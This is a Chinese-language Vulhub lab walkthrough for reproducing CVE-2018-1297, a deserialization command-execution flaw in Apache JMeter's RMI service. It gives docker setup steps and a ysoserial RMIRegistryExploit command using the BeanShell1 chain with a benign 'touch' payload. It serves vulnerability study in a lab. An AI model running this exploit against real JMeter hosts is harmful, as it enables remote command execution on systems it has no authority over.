利用Vulnhub复现漏洞 - Jmeter RMI 反序列化命令执行漏洞（CVE-2018-1297）

Vulnhub官方复现教程

https://vulhub.org/#/environments/jmeter/CVE-2018-1297/

漏洞原理

Apache JMeter是美国阿帕奇（Apache）软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。其2.x版本和3.x版本中存在反序列化漏洞，攻击者可以利用该漏洞在目标服务器上执行任意命令。

复现过程

启动环境

https://blog.csdn.net/JiangBuLiu/article/details/93853056
进入路径为

cd /root/vulhub/jmeter/CVE-2018-1297

搭建及运行漏洞环境：

docker-compose build && docker-compose up -d

用时：3分钟
环境启动后，将启动一个RMI服务并监听1099端口。

漏洞复现

利用ysoserial

直接使用ysoserial即可进行利用：

java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 BeanShell1 'touch /tmp/CVE-2018-1297_is_success'

使用的是BeanShell1这条利用链。

检查结果

进入容器

docker-compose exec jmeter bash

可见CVE-2018-1297_is_success已成功创建：